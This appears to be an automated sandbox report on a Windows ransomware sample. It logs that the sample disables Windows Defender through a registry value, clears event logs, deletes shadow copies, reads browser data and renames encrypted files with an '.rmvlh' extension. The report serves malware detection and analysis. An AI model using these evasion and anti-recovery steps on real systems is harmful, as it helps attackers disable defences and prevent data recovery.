Malware Analysis Report

2024-10-16 03:13

Sample ID 220113-m9h3pahfhp
Target cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
SHA256 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
Tags
evasion ransomware spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52

Threat Level: Known bad

The file cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52 was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 11:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 11:09

Reported

2022-01-13 11:15

Platform

win7-en-20211208

Max time kernel

76s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\OpenAssert.tiff => C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\cpu.html | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9NAdTrUJeC40.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_Qrd4IvnJzPc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\RSSFeeds.js | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ADiRQllairk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosecolor.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MXZJJ4WUxnQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rq7e2_KsCQs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_f8M-jawD-IY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_wWZPaLIDDeU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_RJf62V18BVc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_8dkGt0xinNI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Services\verisign.bmp | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ljF4K7p5GvM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IPSEventLogMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\calendar.html | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\OFFICE10.MML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__MGKcq8DDRA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h7T4MxsDRmc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FORM.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_WprltnpjyXY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3qDjTSVtFDo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_juk-N-WIYMw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TK3AtYmSjO80.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_K5gdYiYM_fY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_BR_ZN6vFapI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_esaxQFczKTQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Chicago.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_KYzaN8XbyRw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_r2SdrmcUdkE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h_9LQox2V3o0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rFB-NOHF3hA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_g14wyIsXjQ40.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_iYtaBE56RB00.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MNBjHMEZzQQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_UGPjbt12ic80.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MAIN.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_DEUeS8swjTI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_sa1y37L73aE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zvTl_2HK4Zo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3H_x3N34MjM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_335IA03UFWw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_C7HNnOm9oms0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_PM1W1QnOLZU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TC6ECwCeRb40.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_GGmywEV8mYk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__ygF8GhN0Nw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Dawson.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zQuZxzJAfA40.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_viXym954DZc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\picturePuzzle.css | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBOB6.CHM.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_uVD9FKTWw9k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | N/A |

Launches sc.exe

Interacts with shadow copies

ransomware
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |

Runs net.exe

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
